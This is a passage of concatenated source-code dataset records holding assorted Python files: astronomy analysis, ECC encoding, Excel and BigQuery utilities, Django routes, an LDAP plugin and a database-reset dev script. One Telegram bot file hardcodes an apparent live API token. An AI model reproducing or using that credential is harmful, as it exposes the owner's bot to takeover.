win.fill(white, bullet)\n pygame.display.flip()\n","repo_name":"yingqiw/games-shoottarget","sub_path":"target_shooter.py","file_name":"target_shooter.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18050496256","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport numpy as np\nfrom numpy.polynomial import polynomial as P\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom astropy import constants as const\nimport os, sys,argparse\nimport statsmodels.tsa.stattools as st\n\n#####################################################################################\n\n# SET UP ARGUEMENTS\n\n#####################################################################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-n\", \"--nbins\", type=int, default=None, help=\"Number of images files from which to extract the spectrum; note: zero-indexed, so nbins=11 means bin00 to bin10\")\nparser.add_argument(\"-c\", \"--nchan\", type=int, default=None, help=\"Number of channel slices in each cube image; note: zero-indexed\")\nparser.add_argument(\"-s\", \"--src\", type=str, default=None, help=\"Source name to be used for the spectra text file prefix\")\nparser.add_argument(\"--timeres\", type=float, default=None, help=\"Temporal resolution of data in ms\")\nparser.add_argument(\"--freqres\", type=float, default=None, help=\"Spectral resolution of data in MHz\")\nparser.add_argument(\"-f\", \"--basefreq\", type=float, default=None, help=\"The lowest frequency in the observation in MHz\")\nparser.add_argument(\"--frbtitletext\", type=str, default=\"\", help=\"The name of the FRB (or source) to be used as the title of the plots\")\nparser.add_argument(\"--ccfstartstop\", type=str, default=None, help=\"Start and end bins for calculating the CCF (startbin1,stopbin1,startbin2,stopbin2)\")\n\nargs = parser.parse_args()\n\nprint(args)\n\n#####################################################################################\n\n# CATCH ERRORS\n\n#####################################################################################\n\nif len(sys.argv) < 2:\n parser.print_usage()\n sys.exit()\n\nif args.nbins is None:\n parser.error(\"You must specify the number of images you're processing\")\n\nif args.nchan is None:\n parser.error(\"You must specify the number of slices in the cube image\")\n\nif args.src is None:\n parser.error(\"You must specify an input/output spectra file name prefix\")\n\nif args.timeres is None:\n parser.error(\"You must specify the data's temporal resolution\")\n\nif args.freqres is None:\n parser.error(\"You must specify the data's spectral resolution\")\n\nif args.basefreq is None:\n parser.error(\"You must specify the data's lowest frequency\")\n\nif args.ccfstartstop == None or len(args.ccfstartstop.split(',')) != 4:\n parser.error(\"You must specify the bin ranges to use for calculations in format start1,stop1,start2,stop2\")\n\n#####################################################################################\n\n# GLOBAL PARAMETER DEFINITIONS\n\n#####################################################################################\n\n# Source specific parameters\nsrc = args.src # source name\nfrbtitletext = args.frbtitletext # name of source to use in plotting\n\n# Temporal parameters\nnbins = args.nbins # number of time bins\ntimeres = args.timeres # resolution of time bins (ms)\nstarttime = 0 # start time (ms)\nendtime = nbins*timeres # final time (ms)\n\n# Spectral parameters\nnchan = args.nchan # number of frequency channels in the data\nendchan = nchan - 1 # remove final channel due to bandpass rolloff\nfreqres = args.freqres # spectral resolution of the data (MHz)\nbasefreq = args.basefreq # lowest frequency in the data (MHz)\nendfreq = basefreq + (endchan*freqres) # highest frequency to be used (MHz)\nfreqs = np.linspace(basefreq, endfreq, nchan) # MHz\n\n# ACF parameters\nccfstart1 = int(args.ccfstartstop.split(',')[0]) # starting time bin for user selected range\nccfstop1 = int(args.ccfstartstop.split(',')[1]) # final time bin for user selected range\nccfstart2 = int(args.ccfstartstop.split(',')[2]) # starting time bin for user selected range\nccfstop2 = int(args.ccfstartstop.split(',')[3]) # final time bin for user selected range\n\n# Change global font size for easier reading\nmatplotlib.rcParams.update({'font.size': 16})\n\n\n#####################################################################################\n\n# 1D CCF\n\n#####################################################################################\n\n# Load calibrated data\nprint(\"Loading data: {0}-imageplane-dynspectrum-calibrated.stokesI.txt\".format(src))\ndynspec_I = np.loadtxt(\"{0}-imageplane-dynspectrum-calibrated.stokesI.txt\".format(src))\n\n# TODO: Weight the time average by fscrunch, rather than doing a simple mean\npulse1spectra = np.mean(dynspec_I[ccfstart1:ccfstop1+1], 0)\npulse2spectra = np.mean(dynspec_I[ccfstart2:ccfstop2+1], 0)\n\n# CCF calculation for individual bins\nprint(\"Computing CCF between user-selected pulse1 and pulse2\")\n\n# Calculate the 1D CCF across frequency between the two user-selected time ranges using statsmodels.tsa.stattools.ccovf\nccf = st.ccovf(pulse1spectra, pulse2spectra)\n\n# Set up figure and axes\nccf_fig, ccf_ax = plt.subplots(figsize=(7,7))\n\n# Plot the CCF\nccf_ax.plot(ccf, label='CCF (bins {0}-{1} x {2}-{3})'.format(ccfstart1,ccfstop1,ccfstart2,ccfstop2))\nplt.legend()\nccf_fig.savefig(\"{0}-CCF_bin{1}-{2}x{3}-{4}.png\".format(src,ccfstart1,ccfstop1,ccfstart2,ccfstop2), bbox_inches='tight')\n","repo_name":"difx/difx","sub_path":"sites/ASKAP/ccf_scint.py","file_name":"ccf_scint.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"6545465785","text":"from math import floor\n\ndef encode(a, b, p, char, k):\n m = ord(char)\n x = m*k + 1\n found = False\n result = 0\n \n while (not found):\n target_remainder = (x**3 + a*x + b) % p\n for i in range(p):\n if ((i**2) % p == target_remainder):\n found = True\n result = i\n break\n if (not found):\n x += 1\n\n return ((x, result))\n\ndef decode(pair, k):\n return floor((pair[0] - 1)/k)\n\n# encoded = encode(-1, 188, 751, '1', 20)\n# decoded = decode(encoded, 20)\n\n# print(encoded)\n# print(chr(decoded))\n","repo_name":"salsabiilashifa11/crypto-calculator","sub_path":"ecc/kolbitz.py","file_name":"kolbitz.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19529972047","text":"import openpyxl\nfrom find_all_value import find_value\nfrom decoding_data import decoding_operation\nfrom find_description_operation import find_description\n\ndata = find_value()\ndata_1 = decoding_operation()\nmy_dict = find_description()\n\nbook = openpyxl.Workbook()\nsheet = book.active\nbook_1 = openpyxl.open(\"ValueStreamMapping.xlsx\", read_only=True)\nsheet_4 = book_1.worksheets[4]\n\n# Заполнение шапки документа\nsheet['A1'] = 'ОБОЗНАЧЕНИЕ'\nsheet['B1'] = 'НАИМЕНОВАНИЕ'\nsheet['C1'] = 'МАРШРУТ'\nsheet['D1'] = 'ВХОДИМОСТЬ'\nsheet['E1'] = 'ПАРТИЯ'\nsheet['F1'] = 'ЦЕНА за шт.'\nsheet['G1'] = 'ЦЕНА за комплект'\nsheet['H1'] = '№ ОПЕРАЦИИ'\nsheet['I1'] = 'НАИМЕНОВАНИЕ ОПЕРАЦИИ'\nsheet['J1'] = 'ОБОРУДОВАНИЕ'\nsheet['K1'] = 'Тпз, мин'\nsheet['L1'] = 'Тшт, мин'\nsheet['M1'] = 'КОИД'\n\n#Заполнение общей части информации о детали\nsheet['A2'].value = data[2]\nsheet['B2'].value = data[1]\nsheet['C2'].value = data[8]\nif data[1] == 'Ролик РВП':\n sheet['D2'].value = 7\nelif data[1] == 'Сепаратор РВП':\n sheet['D2'].value = 2\nelse:\n sheet['D2'].value = 1\nsheet['E2'].value = 50 * sheet['D2'].value\n\n#Заполнение данных о каждой операции\nrow = 2\nfor i in data_1:\n if len(i) > 6:\n sheet[row][10].value = i[3]\n sheet[row][11].value = i[4]\n sheet[row][12].value = i[5]\n elif len(i) <= 3:\n sheet[row][10].value = i[1]\n sheet[row][11].value = i[2]\n sheet[row][7].value = i[0]\n elif len(i) > 3 and len(i) <= 6:\n sheet[row][10].value = i[1]\n sheet[row][11].value = i[2]\n sheet[row][7].value = i[0]\n sheet[row+1][10].value = i[4]\n sheet[row+1][11].value = i[5]\n sheet[row+1][7].value = i[3]\n row += 1\n row += 1\n\n# Заполнение описания операций\ncolumn = []\nfor key in my_dict:\n column.append(my_dict[key])\ncolumn_operation = column [10:]\n\nnew_row = 2\nfor val in column_operation:\n for all_val in val:\n if all_val < 47:\n sheet[new_row][7].value = sheet_4[19][all_val].value\n sheet[new_row][8].value = sheet_4[17][all_val].value\n if all_val > 46:\n sheet[new_row][9].value = sheet_4[5][all_val].value\n new_row += 1\n else:\n sheet[new_row][9].value = sheet_4[5][all_val].value\n new_row += 1\n\nbook.save(\"technology.xlsx\")\nbook.close()\n\nprint(\"Файл technology.xlsx записан\")\n","repo_name":"EgorZaharov/Level-Up","sub_path":"Project/record_operation.py","file_name":"record_operation.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"23756752912","text":"import os\nimport argparse\nfrom google.cloud import bigquery\nfrom google.cloud.exceptions import NotFound\n\ndef upload_csv_to_bigquery():\n \"\"\"Uploads a CSV file to a given BigQuery table.\"\"\"\n # Load arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('csv_file', help='Path to the CSV file')\n parser.add_argument('--project_id', help='Google Cloud project ID')\n parser.add_argument('--dataset_id', help='BigQuery dataset ID')\n parser.add_argument('--table_id', help='BigQuery table ID')\n parser.add_argument('--mode', help='append or overwrite', default='append')\n parser.add_argument('--auto_create_table', help='auto create table', default='True') \n\n args = parser.parse_args()\n csv_file_path = args.csv_file\n project_id = args.project_id\n dataset_id = args.dataset_id\n table_id = args.table_id\n mode = args.mode\n auto_create_table = args.auto_create_table == 'True'\n\n # Create a BigQuery client\n client = bigquery.Client(project=project_id)\n\n # Check if the dataset exists\n dataset_ref = client.dataset(dataset_id)\n dataset = bigquery.Dataset(dataset_ref)\n\n # Check if the table exists, create it if necessary\n table_ref = dataset.table(table_id)\n try:\n client.get_table(table_ref)\n except NotFound:\n table = bigquery.Table(table_ref)\n if auto_create_table:\n table = client.create_table(table)\n else:\n raise Exception('Table not found: {}.{}.{}'.format(project_id, dataset_id, table_id))\n\n # Load the CSV data into the table\n job_config = bigquery.LoadJobConfig()\n job_config.source_format = bigquery.SourceFormat.CSV\n job_config.skip_leading_rows = 1\n job_config.autodetect = True\n if mode == 'append':\n job_config.write_disposition = bigquery.WriteDisposition.WRITE_APPEND\n elif mode == 'overwrite':\n job_config.write_disposition = bigquery.WriteDisposition.WRITE_TRUNCATE\n \n with open(csv_file_path, 'rb') as f:\n job = client.load_table_from_file(f, table_ref, job_config=job_config)\n job.result()\n\n print('CSV file uploaded to BigQuery successfully.')\n\n\nif __name__ == '__main__':\n upload_csv_to_bigquery()\n","repo_name":"kromiii/csv2bq","sub_path":"csv2bq/csv2bq.py","file_name":"csv2bq.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17252233529","text":"from datetime import date\nimport re\n\ntry:\n import jinja2\nexcept ImportError:\n jinja2 = None\n\nfrom scheme.exceptions import *\nfrom scheme.timezone import current_timestamp\nfrom scheme.util import string\n\n__all__ = ('Interpolator', 'interpolate_parameters')\n\nVARIABLE_EXPR = re.compile(r'^\\s*[$][{]([^}]+)[}]\\s*$')\n\nclass Interpolator(object):\n \"\"\"The standard jinja-based interpolator.\"\"\"\n\n default_interpolator = None\n standard_filters = []\n standard_globals = []\n\n def __init__(self, filters=None, globals=None):\n self.environment = jinja2.Environment(\n variable_start_string='${',\n variable_end_string='}')\n\n for filter in self.standard_filters:\n self.environment.filters[filter.__name__] = filter\n for function in self.standard_globals:\n self.environment.globals[function.__name__] = function\n\n if filters:\n self.environment.filters.update(filters)\n if globals:\n self.environment.globals.update(globals)\n\n @classmethod\n def default(cls):\n if cls.default_interpolator is None:\n cls.default_interpolator = cls()\n return cls.default_interpolator\n\n def evaluate(self, subject, parameters):\n expression = self.environment.compile_expression(subject, False)\n try:\n value = expression(**parameters)\n if isinstance(value, self.environment.undefined):\n raise UndefinedParameterError()\n except jinja2.UndefinedError:\n raise UndefinedParameterError()\n else:\n return value\n\n def interpolate(self, subject, parameters):\n template = self.environment.from_string(subject)\n return template.render(parameters)\n\ndef interpolate_parameters(subject, parameters, simple=False, interpolator=None):\n \"\"\"Interpolates ``subject``, a template string, using ``parameters``. If ``subject`` is empty,\n an empty string is immediately returned.\n\n :param string subject: The template to interpolate.\n\n :param dict parameters: A ``dict`` of potential values for interpolating ``subject``.\n\n :param boolean simple: Optional, default is ``False``; if ``True``, indicates that subject\n should be treated as a single variable reference, rather then a full template.\n\n :param interpolator: Optional, default is ``None``; a :cls:`Interpolator` instance to use for\n interpolation, instead of the default one.\n \"\"\"\n\n if not isinstance(subject, string):\n raise ValueError(subject)\n if not subject:\n return ''\n\n interpolator = interpolator or Interpolator.default()\n if not simple:\n return interpolator.interpolate(subject, parameters)\n\n match = VARIABLE_EXPR.match(subject)\n if match:\n expression = match.group(1).strip()\n return interpolator.evaluate(expression, parameters)\n else:\n return subject\n","repo_name":"stiles/notebooks","sub_path":"lapd-crimes-arrests/notebook/lib/python3.7/site-packages/scheme/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"7"} +{"seq_id":"7339325136","text":"import telebot\n\ntoken = '5950809236:AAFkP78oCICMqiO78zCJk39Jqb276RBuZaY'\n\nbot = telebot.TeleBot(token)\n# кловиятура\nkeybord = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\n# кнопки\nbutton1 = telebot.types.KeyboardButton('Start')\nbutton2 = telebot.types.KeyboardButton('Quit')\n\n# обеденение\nkeybord.add(button1, button2)\n\n\n@bot.message_handler(commands=['start', 'privet'])\ndef start_message(message):\n bot.send_message(message.chat.id, 'Здравствуйте, выберите кнопку',reply_markup=keybord)\n\n bot.register_next_step_handler(message, check)\n\ndef check(message):\n if message.text == 'Yes':\n bot.send_(message.chat.id, 'CAACAgQAAxkBAAEGgCFjfGALIaBjVNorzBQ4OZwu7FIhjgAClRcAAqbxcR4BOaqKL395ICsE')\n elif message.text == 'No':\n bot.send_sticker(message.chat.id, 'CAACAgQAAxkBAAEGgDVjfGCm1WEyQ7WyEy6pnQF6uerHvwACGRUAAqbxcR54k5QMPt-zJisE')\n\nbot.polling()","repo_name":"AlushkaNutellka/3-mission_ne_dokonca","sub_path":"bots.py","file_name":"bots.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73037857184","text":"\"\"\"\nMerkabah Admin Urls\n\"\"\"\nfrom django.conf.urls.defaults import patterns, url\nfrom merkabah.admin import controllers as ac\n\nurlpatterns = patterns('',\n\n # Main index of the admin controller\n url(r'^$', ac.IndexCtrl.as_django_view(), name=ac.IndexCtrl.view_name),\n\n # Auth\n url(r'^auth/login/$', ac.AuthLoginCtrl.as_django_view(), name=ac.AuthLoginCtrl.view_name),\n url(r'^auth/logout/$', ac.AuthLogoutCtrl.as_django_view(), name=ac.AuthLogoutCtrl.view_name),\n\n # Plugin Controller Endpoints\n url(r'^plugin/(?P[A-Za-z0-9-_]+)/$', ac.PluginIndexCtrl.as_django_view(), name=ac.PluginIndexCtrl.view_name),\n url(r'^plugin/(?P[A-Za-z0-9-_]+)/(?P[A-Za-z0-9-_]+)/$', ac.PluginActionCtrl.as_django_view(), name=ac.PluginActionCtrl.view_name),\n\n\n# url(r'^plugin/(?P[A-Za-z0-9-_/:]+)/$', *admin_views.PluginCtrl.django_url_args()), \n# (r'^gallery/(?P[A-Za-z0-9-_/:]+)/$', 'gallery'),\n# (r'^category/artwork/(?P[A-Za-z0-9-_/:]+)/$', 'gallery'),\n#\n# url(r'^$', *admin_views.IndexCtrl.django_url_args()), \n \n \n)\n\n#urlpatterns += plugin_urls.urlpatterns\n","repo_name":"blainegarrett/merkabah","sub_path":"admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"42132105250","text":"import sys\nimport os\nimport datetime\n\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nimport models\n\ndef signIn(reqData):\n req = reqData['action']['detailParams']['user_id']['value'].split()\n userProfile = models.User.query.filter_by(userid=req[0]).first()\n if userProfile is not None:\n if userProfile.password == req[1]:\n if models.UserStatus.query.filter_by(id=userProfile.id).first() is None:\n models.db.session.add(models.UserStatus(userProfile.id))\n models.db.session.commit()\n \n if userProfile.kakaoKey is None:\n userProfile.kakaoKey = str(reqData['userRequest']['user']['id'])\n models.db.session.commit()\n \n print(\"\\n\" + str(req[0]) + \"님이 로그인 하셨습니다\\n\")\n res = {\n \"version\": \"2.0\",\n \"context\": {\n \"values\": [\n {\n \"name\": \"login_user\",\n \"lifeSpan\": 10,\n \"params\": {\n \"user_id\": req[0]\n }\n }\n ]\n },\n \"template\": {\n \"outputs\": [\n {\n \"simpleText\": {\n \"text\": \"\\\"\" + userProfile.userid + \"\\\"\" + \"님의 마이페이지 🔓\\n[칭호 없음]\"\n } \n }\n ],\n \"quickReplies\": [\n \n {\n \"label\": \"인벤토리 🎒\",\n \"action\": \"block\",\n \"blockId\": \"6109213f3dcccc79addb1958\"\n },\n {\n \"label\": \"활동 🏃‍♂️\",\n \"action\": \"block\",\n \"blockId\": \"610caea93dcccc79addb2654\"\n },\n \n {\n \"label\": \"시스템 🎈\",\n \"action\": \"block\",\n \"blockId\": \"61150c60199a8173c6c4ab47\"\n },\n \n \n ]\n }\n }\n else:\n res = {\n \"version\": \"2.0\",\n \"context\": {\n \"values\": [\n {\n \"name\": \"login_user\",\n \"lifeSpan\": 0,\n \"params\": {\n \"login_user\": None\n }\n }\n ]\n },\n \"template\": {\n \"outputs\": [\n {\n \"simpleText\": {\n \"text\": \"로그인 실패 🧐\\n(비밀번호 틀림)\"\n } \n }\n ],\n \"quickReplies\": [\n {\n \"blockId\": \"61076108a5a4854bcb94b9ba\",\n \"action\": \"block\",\n \"label\": \"다시입력 ✏️\"\n }\n ]\n }\n }\n \n else:\n res = {\n \"version\": \"2.0\",\n \"context\": {\n \"values\": [\n {\n \"name\": \"login_user\",\n \"lifeSpan\": 0,\n \"params\": {\n \"user_id\": None\n }\n }\n ]\n },\n \"template\": {\n \"outputs\": [\n {\n \"simpleText\": {\n \"text\": \"로그인 실패 🧐\\n(없는 아이디)\"\n } \n }\n ],\n \"quickReplies\": [\n {\n \"blockId\": \"61076108a5a4854bcb94b9ba\",\n \"action\": \"block\",\n \"label\": \"다시입력 ✏️\"\n },\n {\n \"blockId\": \"610b4ae0b39c74041ad0ea22\",\n \"action\": \"block\",\n \"label\": \"회원가입 🥕\"\n }\n ]\n }\n }\n return res\n \n \n \n \n","repo_name":"kuyang95/1319_KakaoChatBot","sub_path":"systemPart/signIn.py","file_name":"signIn.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30013362098","text":"\"\"\"\r\nDeletes all tables from the database, this is a development script and should never be called in a production envitonment.\r\n\"\"\"\r\n\r\nimport os\r\nimport os\r\nimport sys\r\nfrom sqlalchemy.engine import reflection\r\nfrom sqlalchemy.schema import DropConstraint, DropTable\r\nimport transaction\r\n\r\nimport random\r\nfrom jcudc24provisioning.controllers.authentication import DefaultPermissions, DefaultRoles\r\nfrom jcudc24provisioning.models import DBSession, Base\r\nfrom jcudc24provisioning.models.project import Location, ProjectTemplate, Project, Dataset, MethodSchema, MethodSchemaField, Project, MethodTemplate, Method, PullDataSource, DatasetDataSource\r\nfrom jcudc24ingesterapi.schemas.data_types import Double\r\nfrom jcudc24provisioning.models import website\r\n\r\nfrom sqlalchemy import engine_from_config, MetaData, ForeignKeyConstraint, Table\r\n\r\nfrom pyramid.paster import (\r\n get_appsettings,\r\n setup_logging,\r\n )\r\nfrom jcudc24provisioning.models.website import User, Role, Permission\r\n\r\ndef usage(argv):\r\n cmd = os.path.basename(argv[0])\r\n print('usage: %s \\n'\r\n '(example: \"%s development.ini\")' % (cmd, cmd)) \r\n sys.exit(1)\r\n\r\ndef main(argv=sys.argv):\r\n if len(argv) != 2:\r\n usage(argv)\r\n config_uri = argv[1]\r\n setup_logging(config_uri)\r\n settings = get_appsettings(config_uri)\r\n delete_all_tables(settings)\r\n\r\ndef delete_all_tables(settings):\r\n \"\"\"\r\n Initialise the database connection and delete all data base tables.\r\n\r\n :param settings:\r\n :return:\r\n \"\"\"\r\n\r\n # Initialise the database connection.\r\n engine = engine_from_config(settings, 'sqlalchemy.', pool_recycle=3600)\r\n\r\n conn = engine.connect()\r\n # the transaction only applies if the DB supports\r\n # transactional DDL, i.e. Postgresql, MS SQL Server\r\n trans = conn.begin()\r\n\r\n inspector = reflection.Inspector.from_engine(engine)\r\n\r\n # gather all data first before dropping anything.\r\n # some DBs lock after things have been dropped in\r\n # a transaction.\r\n\r\n metadata = MetaData()\r\n\r\n tbs = []\r\n all_fks = []\r\n\r\n for table_name in inspector.get_table_names():\r\n fks = []\r\n for fk in inspector.get_foreign_keys(table_name):\r\n if not fk['name']:\r\n continue\r\n fks.append(\r\n ForeignKeyConstraint((),(),name=fk['name'])\r\n )\r\n t = Table(table_name,metadata,*fks)\r\n tbs.append(t)\r\n all_fks.extend(fks)\r\n\r\n for fkc in all_fks:\r\n conn.execute(DropConstraint(fkc))\r\n\r\n for table in tbs:\r\n conn.execute(DropTable(table))\r\n\r\n trans.commit()","repo_name":"jcu-eresearch/dc24-rich-data-capture","sub_path":"jcudc24provisioning/scripts/delete_all_tables.py","file_name":"delete_all_tables.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"27592598757","text":"import json\n\nbase = {\n 'questCount' : 1,\n \n 'answers' : {\n '1': None,\n '2': None,\n '3': None,\n '4': None\n },\n\n 'account':{\n 'login' : None,\n 'pasword' : None,\n\n },\n\n 'enterInAccount' : False\n\n}\n\nwith open(\"data.json\", \"r\") as read_file:\n data = json.load(read_file)\n\n \t\nwith open(\"data.json\", \"w\") as write_file:\n json.dump(data, write_file, indent = 4)","repo_name":"nyarRoller/Sailor-Sender","sub_path":"dist/Sailor-Sender/data/jsonGenerator.py","file_name":"jsonGenerator.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"35752969370","text":"#\n# An ldap data model plugin for hypnotoad.\n#\n\nimport ldap\nimport logging\n\nfrom hypnotoad.core import plugin\n\nLOG = logging.getLogger('root')\n\n\nclass ldap_plugin(plugin.data_model_plugin):\n\n def setup(self, config, model_version):\n \"\"\"Called before the plugin is asked to do anything.\"\"\"\n\n if config.getboolean('Data Model Options', 'ldap_plugin_enabled'):\n self.plugin_enabled = True\n LOG.debug(\"LDAP plugin enabled\")\n\n ldap_url = config.get('Data Model Options', 'ldap_server')\n ldap_dc = config.get('Data Model Options', 'ldap_dc')\n\n ldap_ou_group = config.get('Data Model Options', 'ldap_ou_group')\n ldap_ou_user = config.get('Data Model Options', 'ldap_ou_user')\n\n ldap_timeout = config.getfloat(\n 'Data Model Options', 'ldap_timeout')\n\n self.ldap_dn_user = \"ou=\" + ldap_ou_user + \",\" + ldap_dc\n self.ldap_dn_group = \"ou=\" + ldap_ou_group + \",\" + ldap_dc\n\n LOG.debug(\"URL: \" + ldap_url)\n LOG.debug(\"Base DC: \" + ldap_dc)\n LOG.debug(\"DN for groups: \" + self.ldap_dn_group)\n LOG.debug(\"DN for users: \" + self.ldap_dn_user)\n\n self.ldap_ctx = ldap.initialize(ldap_url)\n self.ldap_ctx.set_option(ldap.OPT_NETWORK_TIMEOUT, ldap_timeout)\n\n self.config = config\n self.model_version = model_version\n else:\n self.plugin_enabled = False\n\n def teardown(self):\n \"\"\"Called to allow the plugin to free anything.\"\"\"\n\n if self.plugin_enabled:\n LOG.debug(\"Got to ldap plugin teardown\")\n self.ldap_ctx.unbind_s()\n\n def get_model(self):\n \"\"\"Look up information in this data model.\"\"\"\n\n model = []\n\n if self.plugin_enabled:\n LOG.debug(\"Got to ldap plugin get_model\")\n\n model.append(\n {'little_lang_entry': {'version': self.model_version}})\n\n def ldap_search(dn, attrs):\n return self.ldap_ctx.search_s(dn, ldap.SCOPE_SUBTREE, '(cn=*)', attrs)\n\n users = ldap_search(self.ldap_dn_user, [\n 'cn', 'gidNumber', 'homeDirectory', 'uid',\n 'uidNumber', 'gecos', 'hpcDRMadef', 'loginShell'\n ])\n\n LOG.debug(\"Found \" + str(len(users)) + \" users.\")\n\n for u in users:\n dn, attrs = u\n\n model.append({'user_entry': {\n 'short_name_string': attrs['uid'][0],\n 'full_name_string': attrs['cn'][0],\n 'group_id_integer': attrs['gidNumber'][0],\n 'user_id_integer': attrs['uidNumber'][0],\n 'home_directory_string': attrs['homeDirectory'][0],\n 'login_shell_string': attrs['loginShell'][0],\n 'priority_fairshare_float': '',\n 'priority_qos_name_array': ''\n }})\n\n groups = ldap_search(\n self.ldap_dn_group, ['cn', 'hpcDRMshare', 'memberUid'])\n\n for g in groups:\n dn, attrs = g\n LOG.debug(\"Found group with DN: \" + dn)\n model.append({'group_entry': {\n 'short_name_string': attrs['cn'][0],\n 'priority_fairshare_float': attrs['hpcDRMshare'][0],\n }})\n\n return model\n\n# EOF\n","repo_name":"hpc/hypnotoad","sub_path":"hypnotoad/plugins/datamodels/ldap/ldap_plugin.py","file_name":"ldap_plugin.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21320441431","text":"arr=['A','B','C']\npath=['']*5\n\n\ndef abc(level):\n if level==2:\n for j in range(len(path)):\n print(path[j], end='')\n print()\n return\n\n for i in range(3):\n path[level]=arr[i]\n abc(level+1)\n\nabc(0)","repo_name":"giokim12/Algorithm","sub_path":"mincoding/22/min_22_1.py","file_name":"min_22_1.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35662426601","text":"NECROMANCY_AGONY = 59411\nNECROMANCY_AGONY_NEW = 59412\nNECROMANCY_AGONY_OLD = 59413\nNECROMANCY_ANIMATE_DEAD_NEW = 59414\nNECROMANCY_ANIMATE_DEAD_OLD = 59415\nNECROMANCY_ANIMATE_SKELETON = 59416\nNECROMANCY_ANIMATE_SKELETON_NEW = 59417\nNECROMANCY_ANIMATE_SKELETON_OLD = 59418\nNECROMANCY_BOLT_OF_DRAINING_NEW = 59419\nNECROMANCY_BOLT_OF_DRAINING_OLD = 59420\nNECROMANCY_BONE_SHARDS = 59421\nNECROMANCY_BORGNJORS_REVIVIFICATION_NEW = 59422\nNECROMANCY_BORGNJORS_REVIVIFICATION_OLD = 59423\nNECROMANCY_CIGOTUVIS_DEGENERATION = 59424\nNECROMANCY_CIGOTUVIS_EMBRACE = 59425\nNECROMANCY_CONTROL_UNDEAD = 59426\nNECROMANCY_CONTROL_UNDEAD_NEW = 59427\nNECROMANCY_CONTROL_UNDEAD_OLD = 59428\nNECROMANCY_CORPSE_ROT_NEW = 59429\nNECROMANCY_CORPSE_ROT_OLD = 59430\nNECROMANCY_DEATH_CHANNEL = 59431\nNECROMANCY_DEATH_CHANNEL_NEW = 59432\nNECROMANCY_DEATH_CHANNEL_OLD = 59433\nNECROMANCY_DEATHS_DOOR_NEW = 59434\nNECROMANCY_DEATHS_DOOR_OLD = 59435\nNECROMANCY_DISPEL_UNDEAD_NEW = 59436\nNECROMANCY_DISPEL_UNDEAD_OLD = 59437\nNECROMANCY_EXCRUCIATING_WOUNDS_NEW = 59438\nNECROMANCY_EXCRUCIATING_WOUNDS_OLD = 59439\nNECROMANCY_FULSOME_DISTILLATION = 59440\nNECROMANCY_HAUNT_NEW = 59441\nNECROMANCY_HAUNT_OLD = 59442\nNECROMANCY_LETHAL_INFUSION = 59443\nNECROMANCY_NECROMUTATION_NEW = 59444\nNECROMANCY_NECROMUTATION_OLD = 59445\nNECROMANCY_PAIN_NEW = 59446\nNECROMANCY_PAIN_OLD = 59447\nNECROMANCY_REGENERATION_NEW = 59448\nNECROMANCY_REGENERATION_OLD = 59449\nNECROMANCY_SIMULACRUM_NEW = 59450\nNECROMANCY_SIMULACRUM_OLD = 59451\nNECROMANCY_SUBLIMATION_OF_BLOOD = 59452\nNECROMANCY_SUBLIMATION_OF_BLOOD_NEW = 59453\nNECROMANCY_SUBLIMATION_OF_BLOOD_OLD = 59454\nNECROMANCY_SYMBOL_OF_TORMENT = 59455\nNECROMANCY_SYMBOL_OF_TORMENT_NEW = 59456\nNECROMANCY_SYMBOL_OF_TORMENT_OLD = 59457\nNECROMANCY_TOMB_OF_DOROKLOHE = 59458\nNECROMANCY_TWISTED_RESURRECTION_NEW = 59459\nNECROMANCY_TWISTED_RESURRECTION_OLD = 59460\nNECROMANCY_VAMPIRIC_DRAINING_NEW = 59461\nNECROMANCY_VAMPIRIC_DRAINING_OLD = 59462\n","repo_name":"ProdigalNerd/EternalFacade","sub_path":"_assets/tile_refs/gui/spells/necromancy/necromancy.py","file_name":"necromancy.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6014120902","text":"import pickle\n\nfrom pdb import set_trace as T\nfrom query import BigQuery, format_response\n\nlambda_sql = '''\nSELECT\n pickup as station,\n count(*) as pickups\nFROM [nyc_taxi_data.yellow_filtered]\nGROUP BY station\nORDER by pickups DESC\n'''\nbq = BigQuery('nyc-taxi-trips-analysis')\n\nres = format_response(bq.query(lambda_sql))\npickle.dumps(res, 